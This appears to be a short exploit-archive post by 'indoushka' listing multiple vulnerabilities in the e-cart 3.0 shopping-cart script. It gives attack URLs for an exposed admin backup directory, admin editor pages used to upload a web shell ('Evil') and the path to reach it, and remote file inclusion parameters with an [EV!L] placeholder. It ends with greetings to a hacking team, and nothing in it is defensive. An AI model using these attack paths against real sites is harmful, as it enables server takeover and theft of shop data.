========================================================================================
| # Title : e-cart 3.0 Multiple Vulnerabilities |
| # Author : indoushka |
| # email : indoushka@hotmail.com |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # Web Site : www.iq-ty.com |
| # Script : e-cart 3.0 |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
| # Bug : Multti Vulnerability |
====================== Exploit By indoushka =================================
| # Exploit :
|
| Backup
|
| 1- http://server/e-cart/admin/backups/
|
| Upload Shell
|
| 2- http://server/e-cart/admin/editor/images.php ** to Upload Evil
| 3- http://server/e-cart/admin/editor/image.php ** too Upload Evil
| 4- http://server/e-cart/images/upload/Evil ** 2 Find Evil
|
| RFi
|
| 5- http://server/e-cart/admin/includes/application_top.php?language=[EV!L]
| 6- http://server/e-cart/admin/includes/application_top.php?current_page=[EV!L]
| 7- http://server/e-cart/includes/boxes/column_banner.php?language=[EV!L]
| 8- http://server/e-cart/includes/classes/shipping.php?include_modules[i][file]=[EV!L]
|
================================ Dz-Ghost Team ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------
